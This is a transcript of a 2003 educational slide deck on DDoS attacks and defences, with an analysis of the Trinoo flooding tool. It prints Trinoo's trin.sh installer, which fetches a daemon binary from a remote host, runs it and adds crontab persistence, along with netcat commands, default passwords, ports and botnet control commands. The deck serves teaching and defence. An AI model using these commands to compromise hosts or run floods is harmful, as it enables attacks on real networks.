An Introduction to DDoS - PowerPoint PPT Presentation

Loading...

PPT – An Introduction to DDoS PowerPoint presentation | free to download - id: 36d0a-ZDYzY



Loading


The Adobe Flash plugin is needed to view this content

Get the plugin now

View by Category
About This Presentation
Title:

An Introduction to DDoS

Description:

Encrypted password compiled into master and daemon using crypt ... Also block normal programs using the same ports. The attack tool Trinoo ... – PowerPoint PPT presentation

Number of Views:121
Avg rating:3.0/5.0
Slides: 56
Provided by: cseCu
Category:

less

Write a Comment
User Comments (0)
Transcript and Presenter's Notes

Title: An Introduction to DDoS


1
An Introduction to DDoS
  • And the Trinoo Attack Tool

Prepared by Ray Lam, Ivan Wong July 10, 2003
2
Outline
  • Background on DDoS
  • Attack mechanism
  • Ways to defend
  • The attack tool Trinoo
  • Introduction
  • Attack scenario
  • Symptoms and defense
  • Weaknesses and next evolution

3
Background on DDoS
  • Attack mechanism

4
Denial-Of-Service
  • Flooding-based
  • Send packets to victims
  • Network resources
  • System resources
  • Traditional DOS
  • One attacker
  • Distributed DOS
  • Countless attackers

5
Attack Mechanism
  • Direct Attack
  • Reflector Attack

TCP SYN-ACK, TCP RST, ICMP, UDP..
TCP SYN, ICMP, UDP With Rs Address as source IP
address.
R
A
TCP SYN, ICMP, UDP.. With Vs Address as source
IP address.
R
TCP SYN-ACK, TCP RST, ICMP, UDP..
V
6
Attack Architecture
A
A
TCP SYN, ICMP, UDP.. (with Vs address as the
source IP addresses)
Masters (handlers)
Masters (handlers)
Agents (Daemons or Zombies)
Agents (Daemons or Zombies)
Reflectors
TCP SYN, ICMP, UDP.. (the source IP addresses are
usually spoofed)
TCP SYN-ACK, TCP RST, ICMP, UDP..
V
V
Direct Attack
Reflector Attack
7
Attack Methods
8
BackScatter Analysis (Moore et al.)
  • Measured DOS activity on the Internet.
  • TCP (94 )
  • UDP (2 )
  • ICMP (2 )
  • TCP attacks based mainly on SYN flooding

9
Background on DDoS
  • Ways to defend

10
Strategy
  • Three lines of defense
  • Attack prevention- before the attack
  • Attack detection and filtering- during the
    attack
  • Attack source traceback- during and after the
    attack

11
Attack prevention
  • Protect hosts from installation of masters and
    agents by attackers
  • Scan hosts for symptoms of agents being installed
  • Monitor network traffic for known message
    exchanges among attackers, masters, agents

12
Attack prevention
  • Inadequate and hard to deploy
  • Dont-care users leave security holes
  • ISP and enterprise networks do not have incentives

13
Attack source traceback
  • Identify actual origin of packet
  • Without relying on source IP of packet
  • 2 approaches
  • Routers record info of packets
  • Routers send additional info of packets to
    destination

14
Attack source traceback
  • Source traceback cannot stop ongoing DDoS attack
  • Cannot trace origins behind firewalls, NAT
    (network address translators)
  • More to do for reflector attack (attack packets
    from legitimate sources)
  • Useful in post-attack law enforcement

15
Attack detection and filtering
  • Detection
  • Identify DDoS attack and attack packets
  • Filtering
  • Classify normal and attack packets
  • Drop attack packets

16
Attack detection and filtering
  • Can be done in 4 places
  • Victims network
  • Victims ISP network
  • Further upstream ISP network
  • Attack source networks
  • Dispersed agents send packets to single victim
  • Like pouring packets from top of funnel

17
Attack detection and filtering
Effectiveness of detection increases
Attack sourcenetworks
Effectiveness of filtering increases
Further upstreamISP networks
Victims ISP network
Victims network
Victim
18
Attack detection and filtering
  • Detection
  • Easy at victims network large amount of attack
    packets
  • Difficult at individual agents network small
    amount of attack packets
  • Filtering
  • Effective at agents networks less likely to
    drop normal packets
  • Ineffective at victims network more normal
    packets are dropped

19
DF at agents network
  • Usually cannot detect DDoS attack
  • Can filter attack packets with address spoofed
  • Attack packets in direct attacks
  • Attack packets from agents to reflectors in
    reflector attacks
  • Ensuring all ISPs to install ingress packet
    filtering is impossible

20
DF at victims network
  • Detect DDoS attack
  • Unusually high volume of incoming traffic of
    certain packet types
  • Degraded server and network performance
  • Filtering is ineffective
  • Attack and normal packets have same destination
    victims IP and port
  • Attack packets have source IP spoofed or come
    from many different IPs
  • Attack and normal packets indistinguishable

21
DF at victims upstream ISP
  • Often requested by victim to filter attack
    packets
  • Alert protocol
  • Victim cannot receive ACK from ISP
  • Requires strong authentication and encryption
  • Filtering ineffective
  • ISP network may also be jammed

22
DF at further upstream ISP
  • Backpressure approach
  • Victim detects DDoS attack
  • Upstream ISPs filter attack packets

23
The attack tool Trinoo
  • Introduction

24
Introduction
  • Discovered in August 1999
  • Daemons found on Solaris 2.x systems
  • Attack a system in University of Minnesota
  • Victim unusable for 2 days

25
Attack type
  • UDP flooding
  • Default size of UDP packet 1000 bytes
  • malloc() buffer of this size and send
    uninitialized content
  • Default period of attack 120 seconds
  • Destination port randomly chosen from 0 65534

26
The attack tool Trinoo
  • Attack scenario

27
Installation
  • Hack an account
  • Acts as repository
  • Scanning tools, attack tools, Trinoo daemons,
    Trinoo maters, etc.
  • Requirements
  • High bandwidth connection
  • Large number of users
  • Little administrative oversight

28
Installation
  • Compromise systems
  • Look for vulnerable systems
  • Unpatched Sun Solaris and Linux
  • Remote buffer overflow exploitation
  • Set up root account
  • Open TCP ports
  • Keep a friend list

29
Installation
  • Install daemons
  • Use netcat (nc) and trin.sh
  • netcat
  • Network version of cat
  • trin.sh
  • Shell script to set up daemons

./trin.sh nc 128.aaa.167.217 1524 ./trin.sh
nc 128.aaa.167.218 1524
30
Installation
  • trin.sh

echo "rcp 192.168.0.1leaf /usr/sbin/rpc.listen" e
cho "echo rcp is done moving binary" echo "chmod
x /usr/sbin/rpc.listen" echo "echo launching
trinoo" echo "/usr/sbin/rpc.listen" echo "echo
\ \ \ \ \ /usr/sbin/rpc.listen gt cron" echo
"crontab cron" echo "echo launched" echo "exit"
31
Architecture
Attacker
Direct Attack
Masters (handlers)
Agents (Daemons or Zombies)
Victim
32
Communication ports
  • Monitor specific ports to detect presence of
    master, agent

Attacker
Master
Daemon
UDP
Port 31335
TCP
UDP
Port 27444
Port 27665
33
Password protection
  • Password used to prevent administrators or other
    hackers to take control
  • Encrypted password compiled into master and
    daemon using crypt()
  • Clear-text password is sent over network
    session is not encrypted
  • Received password is encrypted and compared

34
Password protection
  • Default passwords
  • l44adsl trinoo daemon password
  • gOrave trinoo master server startup
  • betaalmostdone trinoo master remote interface
    password
  • killme trinoo master password to control
    mdie command

35
Login to master
  • Telnet to port 27665 of the host with master
  • Enter password betaalmostdone
  • Warn if others try to connect the master

root_at_r2 root telnet r1 27665 Trying
192.168.249.201... Connected to r1.router
(192.168.249.201). Escape character is
''. betaalmostdone trinoo v1.07d2f3c..rpm8d/c
b4Sx/ trinoogt
36
Master and daemon
  • Communicate by UDP packets
  • Command line format
  • arg1 password arg2
  • Default password is l44adsl
  • When daemon starts, it sends HELLO to master
  • Master maintains list of daemon

37
Master commands
  • dos IP
  • DoS the IP address specified
  • aaa l44adsl IP sent to each daemon
  • mdos ltip1ip2ip3gt
  • DoS the IPs simultaneously
  • mtimer N
  • Set attack period to N seconds

38
Master commands
  • bcast
  • List all daemons IP
  • mdie password
  • Shutdown all daemons
  • killdead
  • Invite all daemons to send HELLO to master
  • Delete all dead daemons from the list

39
Daemon commands
  • Not directly used only used by master to send
    commands to daemons
  • Consist of 3 letters
  • Avoid exposing the commands by using Unix command
    strings on the binary

40
Daemon commands
  • aaa password IP
  • DoS specified IP
  • bbb password N
  • Set attack period to N seconds
  • rsz password N
  • Set attack packet size to N bytes

41
The attack tool Trinoo
  • Symptoms and defense

42
Symptoms
  • Masters
  • Crontab
  • Friend list
  • -b

/usr/sbin/rpc.listen
ls -l ... ...-b -rw------- 1 root
root 25 Sep 26 1446 ... -rw-------
1 root root 50 Sep 26 1430 ...-b
43
Symptoms
  • Masters (Cont)
  • Socket status

netstat -a --inet Active Internet connections
(servers and established) Proto Recv-Q Send-Q
Local Address Foreign Address
State tcp 0 0 27665
LISTEN . .
. udp 0 0 31335
. . .
44
Symptoms
  • Masters (Cont)
  • File status

lsof egrep "3133527665" master 1292
root 3u inet 2460 UDP
31335 master 1292 root 4u inet
2461 TCP 27665 (LISTEN) lsof -p
1292 COMMAND PID USER FD TYPE DEVICE SIZE
NODE NAME master 1292 root cwd
DIR 3,1 1024 14356 /tmp/... master
1292 root rtd DIR 3,1
1024 2 / master 1292 root
txt REG 3,1 30492 14357
/tmp/.../master master 1292 root mem
REG 3,1 342206 28976
/lib/ld-2.1.1.so master 1292 root
mem REG 3,1 63878 29116
/lib/libcrypt-2.1.1.so
45
Symptoms
  • Daemons
  • Socket status

netstat -a --inet Active Internet connections
(servers and established) Proto Recv-Q Send-Q
Local Address Foreign Address
State . . . udp 0 0 1024

udp 0 0 27444
. . .
46
Symptoms
  • Daemons (Cont)
  • File status

lsof egrep "27444" ns 1316 root
3u inet 2502 UDP 27444
lsof -p 1316 COMMAND PID USER FD TYPE DEVICE
SIZE NODE NAME ns 1316 root cwd
DIR 3,1 1024 153694 /tmp/... ns
1316 root rtd DIR 3,1 1024
2 / ns 1316 root txt REG
3,1 6156 153711 /tmp/.../ns ns
1316 root mem REG 3,1 342206 28976
/lib/ld-2.1.1.so ns 1316 root mem
REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so ns
1316 root mem REG 3,1 4016683
29115 /lib/libc-2.1.1.so
47
Defenses
  • Prevent root level compromise
  • Patch systems
  • Set up firewalls
  • Monitor traffics
  • Block abused ports
  • High numbered UDP ports
  • Trade off
  • Also block normal programs using the same ports

48
The attack tool Trinoo
  • Weaknesses and next evolution

49
Weaknesses
  • Single kind of attack
  • UDP flooding
  • Easily defended by single defense tools
  • Use IP as destination address
  • Moving target defense victim changes IP to
    avoid attack

50
Weaknesses
  • Password, encrypted password, commands visible in
    binary images
  • Use Unix command strings to obtain- strings
    master- strings n3 ns
  • Check if Trinoo found
  • Crack the encrypted passwords

51
Weaknesses
  • Password travels in plain text in network
  • Daemon password frequently sent in
    master-to-daemon commands
  • Get password by ngrep, tcpdump which show UDP
    payload

52
Uproot a Trinoo network
  • Locate a daemon
  • Use strings to obtain IPs of masters
  • Contact sites with master installed
  • Those sites check list of daemons
  • By inspecting file or get master login
    password and use bcast command
  • Get mdie password
  • Use mdie to shut down all daemons
  • mdie periodically as daemons restarted by
    crontab

53
Next evolution
  • Combination of several attack types
  • SYN flood, UDP flood, ICMP flood
  • Higher chance of successful attack
  • Stronger encryption of embedded strings,
    passwords
  • Use encrypted communication channel
  • Communicate by protocol difficult to be detected
    or blocked, e.g. ICMP

54
References
  • R. Chang, Defending against Flooding-Based
    Distributed Denial-of-Service Attacks A
    Tutorial, Oct. 2002
  • D. Dittrich, The DoS Projects Trinoo
    Distributed Denial of Service Attack Tool,
    http//staff.washington.edu/dittrich/misc/trinoo.a
    nalysis.txt, Oct. 1999

55
Open Discussion
About PowerShow.com